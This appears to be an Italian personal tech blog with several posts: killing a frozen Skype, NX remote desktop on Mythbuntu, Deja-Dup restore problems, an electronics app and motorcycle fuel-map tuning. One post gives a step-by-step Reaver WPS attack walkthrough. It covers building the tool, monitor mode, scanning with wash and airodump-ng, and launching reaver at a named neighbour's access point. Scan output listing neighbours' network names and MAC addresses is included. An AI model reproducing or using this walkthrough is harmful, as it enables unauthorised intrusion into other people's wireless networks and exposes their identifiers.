lunedì 6 febbraio 2012

Come killare forzatamente task bloccati (come Skype) in Ubuntu

Molti di voi utilizzeranno Skype, sotto Linux ... Avrete notato che ha una fastidiosa tendenza a bloccarsi e soprattuto, si ha l'impossibilità di chiuderlo sia con Taskmanger che con htop.


Ecco la soluzione, ovviamente da linea di comando:  
killall -9 skype

domenica 5 febbraio 2012

Come configurare NX machine Client per Mythbuntu

Il seguente articolo aiuta ad eseguire una connessione desktop remoto verso un PC Mythbuntu (Mediacenter TV Ubuntu Linux) mediante l'ottimo programma NX Machine (in versione gratuita)
Il client va' configurato con il parametro xfce4-session come mostrato in questo articolo:
http://geekyprojects.com/general/manage-mythtv-remotely-with-nx/

Maggiori informazioni su NX Machine
http://www.nomachine.com/download.php
E' interessante notare che il client puo' essere Linux, Windows o Mac !!
La sessione grafica remoto viene avviata anche senza il login dell'utente in locale (differentemente da quel che avviene con Vino)



Maggiori informazioni su Mythbuntu:
http://www.mythbuntu.org/

Backup Linux Deja-Dup ATTENZIONE!!!

Leggendo alcuni forvianti articoli su blog e testate varie online che si riproducono col ben noto meccanismo del copia in colla senza che nessuno alzi un dito per provare le cose in pratica.. leggevo:


DEJA DUP praticamente il sistema di backup PERFETTO per Linux ....


BENE io oggi scrivo qui :  PERFETTO UN CAZZO !!!

quando si fa il backup va sempre tutto liscio ... il problema dei backup è infatti il RESTORE e quando leggi che se vuoi provare Linux Mint o fare una upgrade "fresco" conviene fare il backup e reinstallare tutto.... che è facile ....

BENE STATE ATTENTI !!!!

Il RESTORE di DejaDup non funziona. L'importazione delle chiavi e dei repository installati produce un casino "bloccante"...

Alla fine i dati sono riuscito a tirarli fuori ma non vi dico che casino, quante prove, quante perdite di tempo, e che metodi iper spartani per recuperare i dati...

Mi lascio la libertà di prendermi un po di tempo per documentarvi bene il tutto, in ogni caso volevo avvertirvi!!! Se proprio dovete usare un sistema di backup usate DejaDup con le seguenti 2 accortezze:

-NON INTERROMPETE LA SESSIONE PER POI RIPRENDERLA SULLA STESSA CARTELLA
-FATEVI COMUNQUE UNA COPIA BANALE DEI FILE, SE QUALCOSA ANDRA' STORTO SARA' PERLOMENO PIU' FACILE RECUPERARE QUALCHE FILE DI IMPORTANZA VITALE ....

venerdì 3 febbraio 2012

WPA Cracking ... un'altra favola per chi ama riempirsi la bocca ...

Di recente in Internet è apparso un nuovo sistema di forzatura delle reti WPA chiamato Reaver ... a titolo esemplificativo vi linko alcuni articoli...

http://www.bufferoverflow.it/2012/01/08/bucare-una-rete-wi-fi-protetta-con-ubuntu-usando-reaver/
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

Tempo fa' era uscito un'altro sistema (GERIX) ... leggete questo titolo ...

http://www.hackgeek.it/con-gerix-wifi-cracker-anche-mia-nonna-saprebbe-craccare-una-rete-wifi/

.... tanta fuffa, tanto copia incolla da un sito all'altro da un blog ad un'altro che hanno una cosa in comune oltre alla notizia. NESSUNO PRODUCE RISULTATI DI QUALI APPARATI RISULTINO VULNERABILI E IN QUALI CONDIZIONI.

Bene signori, sappiate che sono tutte fandonie !!!!!
Ho lasciato giorni i PC di casa e dell'ufficio a crackare le mie reti e quelle dei vicini ... senza l'ombra di alcun risultato positivo.... ... Altro che anche mia nonna riuscirebbe a crackare una rete WPA .... solo buoffonate....

Se volete cimentarvi, vi pubblico qui una guida completa che ha funzionato sia su Ubuntu 10.04 che su 11.10.


ed estraetelo.

Reaver và compilato ... per farlo:
---------------------------------------
sudo apt-get install build-essential
sudo apt-get install libpcap0.8-dev
sudo apt-get install libsqlite3-dev

cd ~/Scaricati/reaver-1.4/src

./configure
make
sudo make install
-----------------------------

Per comodità installate anche la suite aircrack-ng
con il comando:
-------------------
sudo apt-get install aircrack-ng
-------------------

pare che nelle prossime versioni di ubuntu il pacchetto non sarà più presente... sarà un casino compilarlo a mano xke bisogna indietreggiare la versione del compilatore c di sistema
questo il link del sorgente:
questo un cenno sulla versione del gcc:


Dopodiche' bisogna mettere l'interfaccia wireless in modo promiscuo. (quindi disabiliteremo la connettività)
---------------------------------------------------------------------
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
-----------------------------------------------------------------
in alternativa si può usare (ma io non l'ho fatto .... tutti i comandi farebbero riferimento a mon0 anzichè wlan 0)
sudo airmon-ng start wlan0 

Ora bisogna cercare le reti vulnerabili all'attacco reaver con la sua utility WASH
-------------------------------------------------
sudo wash -i wlan0 --ignore-fcs
-------------------------------------------------

Questo il risultato:


BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
C0:C1:C0:05:C6:A9       1            -89        1.0               No                RossoSole
E0:91:F5:46:BF:22       6            -90        1.0               No                Elio
02:BD:B9:E2:42:B2       1            -92        1.0               No                dlink
D8:5D:4C:F5:16:27       4            -90        1.0               No                TP-LINK_F51628
08:86:3B:57:23:10       6            -90        1.0               No                belkin.310

Se volete vedere la differenza tra le reti e i client presenti in aria e gli AP vulnerabili bisogna usare AIRODUMP-NG
----------------------------------------------
sudo airodump-ng wlan0

CH 13 ][ Elapsed: 1 min ][ 2012-02-01 12:15                                         
                                                                                                     
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                      
                                                                                                     
 00:0C:42:61:4C:D5  -32      463      239    8   9  54 . WPA  CCMP   PSK  APCavalieri                
 00:0C:42:94:93:CD  -75      353       80    2   9  54 . WPA  CCMP   PSK  APCavalieri                
 00:14:C1:2E:66:19  -86       52        0    0  11  54e. WEP  WEP         USR9111                    
 00:E0:4D:90:F4:6C  -88       14        0    0  11  54   WPA2 CCMP   PSK  InfostradaWiFi-001399      
 E0:91:F5:46:BF:22  -88       53        2    0   6  54e. WPA2 CCMP   PSK  Elio                       
 1C:BD:B9:40:2C:0A  -88       52        0    0   6  54e  WPA2 CCMP   PSK  D-Link                     
 C0:C1:C0:05:C6:A9  -89       46        0    0   1  54e  WPA2 CCMP   PSK  RossoSole                  
 08:86:3B:57:23:10  -89        7        0    0   6  54e  WPA2 CCMP   PSK  belkin.310                 
                                                                                                     
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                           
                                                                                                     
 (not associated)   00:08:CA:21:FA:FA  -51    0 - 1      0        7                                   
 (not associated)   04:46:65:56:9B:60  -87    0 - 1      0       56  Alice-31436523,Alice-36598782,FAS
 (not associated)   3C:4A:92:AC:D9:86  -88    0 - 1     96      116  Alice-45008691                   
 00:0C:42:61:4C:D5  D8:B3:77:16:8F:7F   -1   11 - 0      0        3                                   
 00:0C:42:61:4C:D5  74:A7:22:E0:7D:84  -23   54 -54      0       10                                   
 00:0C:42:61:4C:D5  04:1E:64:BE:67:8C  -61    5 - 1      0       35  APCavalieri                      
 00:0C:42:61:4C:D5  DC:2B:61:68:D8:0E  -63    1 -54      0       86          
-----------------------------------------------

Con questi dati, ho deciso di attaccare l'AP Rossosole ... quello col segnale relativamente migliore.. devo specificare il MAC del AP

-------------------------------------
sudo reaver -i wlan0 -b C0:C1:C0:05:C6:A9 -vv
--------------------------------------

mercoledì 9 novembre 2011

"ElectroDroid" L'elettronica in tasca

Un'utile app Android con utili tabelle come i codici delle resistenze e altre info utili.

"ElectroDroid"

lunedì 7 novembre 2011

Aggiornamento mappa benzina della moto


Dopo l'ultimo lungo giro a Montepulciano, misto tra statali di collina e autostrada, il sistema autotune ha accumulato parecchi dati per aggiustare la mappa benzina in seguito alla sostituzione dei collettori di scarico con un modello "racing". Nella foto seguente potete osservare il sottosella pittosto intasato (2 centraline, fusibili ABS, antifurto satellitare..) del mio Kawasaki Versys 650 2010.


 In primo piano la centralina Dynojet Power Commander 5 (nota anche come PCV), viene fornita con dei connettori di bypass da installare sugli iniettori. La centralina in questo modo riesce a variare il tempo di apertura degli stessi rispetto alla mappatura originale, riuscendo così ad aumentare o diminuire la benzina presente in quell'istante di scoppio. Sotto alla PCV e ai fusibili del sistema ABS si può scorgere il modulo AUTOTUNE. L'installazione di quest'ultimo prevede la sostituzione della sonda lambda originale con quella del modulo. Come previsto dal manuale d'officina del mezzo, vanno presi i dovuti accorgimenti per comunicare alla centralina originale di escludere la sua sonda lambda (altrimenti ci verà segnalato l'errore sul cruscotto e la moto inizierà a girare con una mappa d'accensione prudenziale).
Il modulo AUTOTUNE riesce a leggere il rapporto ARIA Benzina (AFR) grazie alla sonda Lambda e a correlarlo ai dati di apertura farfalla (TPS) e giri motore (RPM) mediante il collegamento CAN BUS verso la PCV. Per leggere correttamente i valori della combustione sulla moto vanno neutralizzati i sistemi di immissione aria secondaria. Il modulo Autotune però è cosi' chiamato perchè non si limita a monitorare, ma quando "attivato" crea un sistema a loopback chiuso, ovvero riesce a correggere la mappatura benzina della moto "on the fly" mentre si viaggia.
Qui sotto potete osservare l'interruttore che attiva o disattiva il sistema Autotune. 


Il modulo interviene secondo un range di correzione impostabile via software e media i dati di correzioni effettuate man mano che si viaggia riuscendo a suggerire una mappa "base" ottimale. Tutte queste correzioni e comunicazioni vengono realizzate con la comunicazione CAN BUS tra il modulo Autotune e la centralina PCV.


Qui sopra potete osservare il collegamento USB tra PCV ed un netbook.
Qui sotto invece vi mostro la schermata del software Dynojet relativa al TARGET AFR.
Piu' il rapporto AFR (Air Fuel Ratio) è basso, più benzina è presente in camera di combustione. Troppa benzina ingolfa il motore o fa consumare di più. Una miscela aria benzina "magra" invece, riduce i consumi ma aumenta i rischi di rottura del motore. Non è definibile scientificamente un target AFR ottimale, questo varia da moto a moto e con un po' di esperienza si riesce a capire da come suona il motore se è magro o grasso. Poter stabilire una mappa degli AFR desiderati offre una grande flessibilità! Si può optare per una carburazione leggermente più magra quando i giri sono medio bassi e l'apertura della manopola del gas è moderata. Quando invece si spalanca il gas e si fa un utilizzo sportivo, il motore deve girare con più benzina in modo che esso possa anche avvalersi del suo potere raffreddante e lubrificante.


Qui di seguito la mappa dei "TRIM" i trim sono i valori correttivi rispetto alla mappa benzina mediati ed elaborati dalla centralina Autotune. Come potete vedere al  momento dello screenshot stavo cliccando su "ACCEPT ALL TRIMS". In questo modo i valori suggeriti vengono inglobati nella mappatura della PCV. I valori sono in "%" rispettivamente alla quantità di benzina impostata nella centralina originale del mezzo.


Qui sotto la mappa benzina risultante. E' interessante notare come uno scarico aperto porti spesso ad uno smagrimento della mappa benzina. Interessante anche notare che la centralina ha arricchito il range dei 4000 - 5000 giri al 10 % di manetta.
Questo è infatti il range delle certificazioni ambientali e spesso i costruttori sono costretti a mettere molta meno benzina del necessario. Molto spesso infatti, in questo intervallo, molto utilizzato nel ciclo urbano, i mezzi totalmente "originali" accusano dei buchi nel tiro del motore.